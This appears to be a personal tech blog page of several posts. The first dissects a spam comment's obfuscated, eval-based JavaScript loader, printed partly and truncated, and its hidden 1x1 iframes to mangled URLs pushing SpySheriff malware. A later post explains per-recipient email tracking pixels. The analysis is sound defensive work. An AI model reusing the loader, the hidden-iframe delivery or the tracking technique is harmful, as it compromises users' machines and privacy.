Disection of a Spam Comment

I get lots of spam comments on my blog each day.  Most are a similar looking spam with a bunch of links.  I moderate all comments to aviod spam, so none of this ever makes it to the site.  But today I got curious – what is this spam for?  Who sends it?

Manually following the URLs in my browser yields some javascript alerts where they are trying to get me to click “OK”.  Let’s see what happens if you do that.  It’s very interesting!

First off, you get the following script.  This is complicated javascript masking technique.  Let’s look at the code.

   1: <script>
2: function bNVEXM(inp)
   3:  {
   4:    var k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh...
   5:    var out="";
   6:    var c1,c2,c3="";
   7:    var e1,e2,e3,e4="";
   8:    var i=0; 
   9:    do { 
  10:      e1=k.indexOf(inp.charAt(i++));
  11:      e2=k.indexOf(inp.charAt(i++));
  12:      e3=k.indexOf(inp.charAt(i++));
  13:      e4=k.indexOf(inp.charAt(i++)); 
  14:      c1=(e1<<2)|(e2>>4);
  15:      c2=((e2&15)<<4)|(e3>>2);
  16:      c3=((e3&3)<<6)|e4;
  17:      out+=String.fromCharCode(c1); 
  18:      if(e3!=64){
  19:        out+=String.fromCharCode(c2)
  20:      };
  21:      if(e4!=64){
  22:        out+=String.fromCharCode(c3);
  23:      } 
  24:    } while(i<inp.length);
  25:    return out; 
  26:  }
  28:  function fDVGFV(a1,b1){
  29:    if(!b1){
  30:      return eval(bNVEXM("ZG9jdW1lbnQud3JpdGUo...
  31:    } 
  32:    var i; 
  33:    var o="";
  34:    var k=314; 
  35:    a1=bNVEXM(a1);
  36:    for(i=0;i<a1.length;i++) {
  37:      o+=String.fromCharCode(
  38:    }
  39:    return o;
  40:  }
  42:  fDVGFV('YVxJUVNEUW5BNpiaaV59NWE2Zj4hNCYyNmQqPy8+bmpj...
  43:  </script>

Pretty complicated, huh? Well, it’s not too hard to decipher.  The main of it is line 42, calling a function fDVGFV().  The argument is an encrypted string of javascript code.  At line 30 (when there is only one argument passed in), it will convert the first argument into javascript code, and call eval to run that javascript code.  That intermediate javascript happens to decode into the following single line:

   1:  document.write(fDVGFV(a1,arguments.callee.toString().replace(/s/g,"")));

So basically, it just does a minor transform on the input code, and then passes it to be decoded again.  Finally, the loop in lines 36-38 actually convert it to text which can be rendered, and the final HTML output becomes (I added xxx to mangle the URLs):

<IFRAME SRC="http://xxxjoutweb.netxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>
<IFRAME SRC="http://xxxfrlynx.infoxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>

These iframes are what actually loads the final webpages into your browser.  After following through a few additional iframes, both of these will ultimately land you at a javascript dialog pushing SpySheriff (see WikiPedia’s description), a well known malware program.  The product is signed with a valid certificate to HiPoint, Ltd, based out of Panama, issued by Thawte.  If you thought that digital signatures have any meaning with software, you are wrong.  Anyone can sign software, even if it is malware…

I can’t seem to find anyone’s explanation of why SpySheriff exists.  But they employ a lot of code to try to get their junk distributed, and they are very persistent.  All this sophistication in their javascript is to camoflauge the javascript so that spam-detection techniques don’t work.  It’s unfortunate that the javascript “eval” function exists at all – I happen to agree with Eric Lippert on this issue.  Eval is not really necessary, and it creates massive security issues for everyone in addition to helping jerks like SpySherrif circumvent spam detectors.  (See again WikiPedia on the subject)

It’s probably worth noting that this security problem, while commonly blamed on Microsoft’s IE, actually originates in Javascript itself, which was invented by Netscape way back in 1995 or so.  IE just copied it with bug-for-bug compatibility!  (Granted, that was over 10 years ago…)

Friendster now has lawyer-value: Patents

GigaOM writes that “Friendster just wrote in to tell us it has been granted a second social networking patent.”  Oh joy.

As I have written before, software patents don’t work.  Soon enough, we’ll see some lawyers talking to Friendster about going after MySpace, Orkut, LinkedIn, Tribe, Tagged, and others for violation of this silly patent.  The money is just too alluring.

Nobody Wins
Let’s say Friendster is right, and that the others are “infringing” (I am making no judgement, but let’s be hypothetical).  Nobody uses Friendster because their service has been miserable.  The service is slow and they just failed to build the right features.  Myspace, Facebook, and even Orkut, have all performed much better and have orders of magnitude more users.  If Friendster were to win a patent-infringement suit, these other companies will either have to pay Friendster hoards of cash (which will just be pocketed by lawyers), or stop offering these features, or both.  In any event – the users of social networking will be the losers – as the products they use will have fewer features and possibly even carry additional fees.  Keep in mind that none of this affected Friendster’s fall – they failed only due to their own poor execution.

Proof of Invalidity
Now, you could say that Friendster pioneered this space and that is why they got the patent.  But this is not true.  The notion of uploading pictures associated to a profile is too obvious and simple.  If you read the patent, you’ll see that covered under this patent would be the notion of uploading a picture to an access-controlled or moderated bulletin board (you have a group of registered users, and there is a “degree of separation” which is enforced via the access control).  Clearly, this was done years ago, and Friendster’s patent is invalid.  The USPO is just not capable of differentiating patent-worthy from bull. 

Sadly, there is a whole army of lawyers that will argue against my example, for they want their own piece of the pie, even if the only way to do it is to steal from those that actually created something useful.

How Times Change

FEBRUARY, 1999:  During testimony in federal court, Microsoft presents a video to show how Internet Explorer cannot be removed from Windows 98 without degrading system performance and other negative impacts.  Government attorney David Boies catches a small mistake in the video, and it is discovered that the video is actually spliced from two machines.  Microsoft’s Jim Allchin claims this was an honest mistake, that IE must be bundled into the operating system, and to remove it would hinder innovation. In the end, Microsoft wins the browser war.  (See also: NY Times)

OCTOBER, 2006:  Microsoft ships Internet Explorer 7, the first major release of a browser from Microsoft in several years.  Microsoft is no longer embroiled in competition with Netscape, and instead faces eroding market share by open-source rival Firefox.  Apparently whatever happened in 1999 which made IE so tightly coupled with the OS is now irrelevant, because this browser is no longer has unified navigation with the shell (see here), can easily be installed and uninstalled, and even runs side-by-side with IE6.

I hate to look a gift horse in the mouth, but which one is it?  I guess technology has improved and now Microsoft has the technology to no longer bundle browsers.  Of course, Netscape had this technology in 1993.  On the positive side, IE7 is a huge leap forward, and its great that users can choose to either use IE6, IE7, or Firefox.  Choice is good!

Search History

While listening to Google’s earnings announcement today, I learned about Google’s new, searchable News Archive.  It allows you to search news articles going back 200 years!  Unfortunately, much of the really old content is paid content.  But you can go back to the early 1900’s and see a fair amount of “free” content too.  Be sure to do an advanced search and select “Return articles with the following price:  no price”.

I don’t really have a great use for this, but it is fun to have history at your fingertips.  Here are a couple of interesting news events I found:

The Assassination, Time Magazine, November 29, 1963

Earthquake in San Francisco, Guardian Unlimited, April 19, 1906

I also learned that in 1957, one Dr Joseph Belshe and a team of doctors plugged a patient into a power outlet as a makeshift defibrillator.  Sweet!

I do look forward to more content coming online through the search archives; there isn’t nearly as much as I’d like to see yet!

Microsoft to give away Office for home use

This isn’t really news, it’s just a prediction. 

With all the new, free office equivalents out there, Microsoft will be giving Office away.  Hooray!  The fact is that the free alternatives are looking pretty good.  If you don’t like Google’s Writely, you can use Zoho.  If you don’t like Zoho, you can use OpenOffice.  The point is that there are lots of viable, free choices.

Now, Microsoft is the only vendor that is deeply entrenched in the corporate market, and that is their stronghold.  One of the biggest threats to that stronghold however, would be to lose the consumer and low-end markets.  As we all know, the tools you learn at home and at school are the tools that you carry with you to the office over time.  College students right now can either spend $199 for office (that is after the $300 “student discount”), or they can use a free alternative.  Obviously, they will be increasingly electing to use the free stuff. Schools already get lots of donated copies of office, but it’s not completely free.  These institutions will also be looking to cut costs and consider what is free. 

So, it is inevitable that Microsoft must curb the spread of free alternatives – otherwise they risk losing the small & medium sized business in the medium term, and the corporations in the long term.  It’s just a matter of when they feel enough pressure at the consumer level to finally give it away. 

Regardless of which word processor “wins” the consumer market, one thing is clear – prices are finally going to drop.  Since most of Microsoft’s revenue comes from the corporate arena, this shouldn’t even affect their bottom line too much.  Wow – everyone wins.

Rojo vs Google Reader Review

I just started using the Google Reader application.  It’s easy to use and uncluttered.  For several years I have been using Rojo’s reader.  Here are some initial thoughts about differences between the two products:

1) I like the way the “mark read” feature works in Google Reader.
Marking items as “read” is a tricky thing to do, even though it sounds simple.  Do users manually mark things as read?  Does having shown it on the screen mark it as read?  Google’s product does a great job at this – they show you articles in newspaper-style, but only when you scroll down past them (which you usually do while reading) does it mark-as-read automatically.  This works great for the user, as it adds zero-clicks to the process of reading articles, and yet tracks the read/unread status well.  So far, I like this much better than Rojo, which has had a difficult time marking read well.

2) The home page is where you read your initial set of articles.  Rojo divides this into two tabs of information: “Front Page” and “My Feeds”.  The former tracks what is popular overall, and the latter is what you want to read.  I have liked Rojo’s front-page a little.  It has shown me content which interested me that I otherwise wouldn’t have discovered.  However, because this is the default front-page with Rojo, I most often find myself two-clicks from where I really want to be.  Overall, its a great feature which I want – when I am bored.  Otherwise, I’d rather just read my stuff.  Google Reader only tackles the second, and could definitely use improvement by adding the first.

3) Adding feeds seems simpler in Google.  You enter a term, it searches (and in my case found 100% of the feeds I was looking for), and you click the ones you want to add.  Rojo has always been a little weak.  It is slow, and it doesn’t find results well.  For example, searching for “belshe” somehow doesn’t find my feed. 

4) One biggest feature which Rojo has is the digg-like “Add Mojo” feature.  This is a great way for users to promote the content they like.  Google does have a “shared items” feature, but it is really quite different.  Having a popularity counter like Rojo or Digg would really help.

5) I am a little worried about Google’s lack of foldering.  GMail suffers the same problem.  While I am a huge fan of search, I’m not such a fan that I would drop all foldering.  How do you manage a large list of feeds without having some way to categorize those which are related?

Overall, both products are very good.  I think Google’s is simpler and faster, while Rojo offers more features.

Use NoSpyMail to combat PattyMail

HP's Patricia DunnIn case you haven’t heard, “PattyMail” is the term coined to describe the sending of email with the intent of spying, the way that HP’s Patricia Dunn allegedly authorized this year. 

The idea is simple.  Say you have someone on your board who is sending confidential email to someone they aren’t supposed to, like a competitor or the press.  Simply add a small HTML image into your confidential e-mail.  Then, in theory, when someone reads the email, the email client will download that image, causing a “ping” to be sent back to your webserver to download the image.  You can then see which domains are fetching your images, and find your leaker.

“But that doesn’t work!” you say.  The answer is maybe.  It is true that most modern e-mail clients suppress HTML fetching by default.  BUT  – if the user clicks “show me the images”, then the images are shown.  So, when emails are coming from a trusted sender, like the chairman of the board, there is a reasonable chance you’ll want to see the graphics too, and open yourself to HTML spying.

“But that still doesn’t identify the leaker!”, you say.  But you are wrong; this is where the difference between HTML mail and “Spy Mail” comes in.  With HTML mail, you may have an image referenced in the email like:

    <img src=”http://www.senderisspying.com/images/logo.jpg”>

In this case, you are right, if you forward this document to 10 people, and then one of them forwards to someone else, you won’t be able to tell which of them did it.  So why not encrypt special data in the image link to identify the leaker?  Instead of the link above, you might send a different email to each person, and the image links might instead look like:

    <img src=”http://www.senderisspying.com/potentialleaker#1/logo.jpg”>

This is SpyMail.  Now, when the sender checks their server logs, they’ll know exactly who the leaker is.  Evidently, this is what Patricia Dunn did.

It turns out that embedding information in email in a clandestine way is not too hard.  But generally, you don’t want the recipient to know they are being spied upon.  And this is where NoSpyMail comes in, because it can detect this.  When you read email with Outlook 2003, it won’t show HTML images.  But, if you tell it to, it will.  And if anyone is spying on you, they’ll get you!  NoSpyMail allows you to view those emails *without* getting spied upon.  How does it do this?  Well, it detects images which contain tracking information, and forcibly removes the tracker.  The image is skipped, but other images will still work.  This allows the reader to more safely read email. I wish I could say it were guaranteed 100% to work, but it is not.  But I do think it catches 95+% of the spymail.

Businesses also use this technique for less nefarious schemes.  For instance, if you sign up for newsletters from Costco, you’ll get HTML mail.  You probably want to see the images, because the sale items are all images.  But, as soon as you do, they’re tracking you, and they’ll know that contacting you by email works, and that you read it, where you read it form, what time you read it from, and whether you are a Windows or a Mac user.  Maybe you care, or maybe you don’t.  NoSpyMail offers a middle ground; you can read the newsletter, but not have to tell Costco that you did.

Anyway, NoSpyMail is normally free.  But, if you are a member of the HP board, and you need some protection, let me know.  Pricing starts at $10,000 per copy.  Probably a good investment for you!

If you leave a machine off for 2 years…

I’m not quite sure how long my laptop was sitting on the shelf, but it was about 2 years.  I just didn’t need it because I had one through work.  But this weekend, I dusted off my old friend and booted it up.  It’s still running Windows XP Pro, so I’m thankful there haven’t been any major shakeups in the OS world over these last two years.

Can you guess how many security updates were recommended to me?

Well, in the first pass, Microsoft recommended 64 patches, mostly security related.  Then, after a reboot for one of those patches, there were 44 more.  I think this might have been a bug and repeating 44 of the earlier 64, I wasn’t watching closely enough. 

After the 64 security fixes, the machine was still not in good shape, and it recommended Windows XP SP2.  110MB downloaded and about 1 hour later, XP-SP2 was running. 

Still not done, though, 12 additional critical and major security updates were yet to be installed.

After the end of that (took about 3 hours end-to-end), I’m ready to go!


One last note:  After doing all these updates, I found that Microsoft Update keeps track of your patching history.  It even still has my history from 2004!  So, prior to my patching frenzy today, I last patched the system on June 11, 2004, with KB839643.  Today, I installed a total of 127 patches.

Porn invades RSS

I’ve been a big fan of Rojo for quite a while, as you’ve probably read.  But recently I’ve been having to report often that RSS from porn sites is occupying the top spots on Rojo.  I guess that is what happens when you have a successful content publishing platform – porn and spam abound.  Today, the #1 site they recommend I read is “Naughty Neighbors July 2006”.  I guess I should have known from the title….